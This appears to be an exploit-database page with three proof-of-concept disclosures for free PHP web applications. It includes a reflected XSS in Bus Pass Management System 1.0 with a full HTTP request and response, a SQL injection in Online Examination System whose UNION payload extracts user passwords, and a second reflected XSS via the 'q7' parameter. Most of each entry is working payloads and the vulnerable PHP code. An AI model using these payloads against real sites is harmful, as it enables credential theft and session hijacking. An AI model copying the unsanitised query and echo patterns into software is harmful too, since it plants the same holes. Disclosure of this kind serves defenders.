    # Exploit Title: Bus Pass Management System 1.0 - 'searchdata' Cross-Site Scripting (XSS)# Date: 2022-07-02# Exploit Author: Ali Alipour# Vendor Homepage: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip# Version: 1.0# Tested on: Windows 10 Pro x64 - XAMPP Server# CVE : N/A#Issue Detail:The value of the searchdata request parameter is copied into the HTML document as plain text between tags. The payload cyne7<script>alert(1)</script>yhltm was submitted in the searchdata parameter. This input was echoed unmodified in the application's response.This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.# Vulnerable page: /buspassms/download-pass.php# Vulnerable Parameter: searchdata [ POST Data ]#Request : POST /buspassms/download-pass.php HTTP/1.1Host: 127.0.0.1Cookie: PHPSESSID=s5iomgj8g4gj5vpeeef6qfb0b3Origin: https://127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Upgrade-Insecure-Requests: 1Referer: https://127.0.0.1/buspassms/download-pass.phpContent-Type: application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36Connection: closeCache-Control: max-age=0Content-Length: 25searchdata=966196cyne7%3cscript%3ealert(1)%3c%2fscript%3eyhltm&search=#Response : HTTP/1.1 200 OKDate: Fri, 01 Jul 2022 00:14:25 GMTServer: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.8X-Powered-By: PHP/7.4.8Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheContent-Length: 6425Connection: closeContent-Type: text/html; charset=UTF-8<!DOCTYPE html><html lang="en"><head><title>Bus Pass Management System || Pass Page</title><script type="application/x-javascript"> addEventListener("load", function() { setTimeout(hideURLba...[SNIP]...<h4 style="padding-bottom: 20px;">Result against "966196cyne7<script>alert(1)</script>yhltm" keyword </h4>...[SNIP]...

Bus Pass Management System 1.0 Cross Site Scripting

Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Online Examination System - SQL Injection# Google Dork: N/A# Date: 2022-9-28# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file account.php<?phpif(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {$eid=@$_GET['eid'];$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );echo '<div class="panel" style="margin:5%">';while($row=mysqli_fetch_array($q) )?>1) Log in to the application after register new userinject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--

Online Examination System 1.0 SQL Injection

Online Examination System version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: Online Examination System - Cross site scripting Reflected# Google Dork: N/A# Date: 2022-9-29# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file index.php157 <?php if(@$_GET['q7'])158 { echo'<p style="color:red;font-size:15px;">'.@$_GET['q7'];}?>http://localhost/examination/index.php?q7=%22%3E%3Cscript%3Ealert(%22yousef%22);%3C/script%3Einject payload parameter q7

Tag

#windows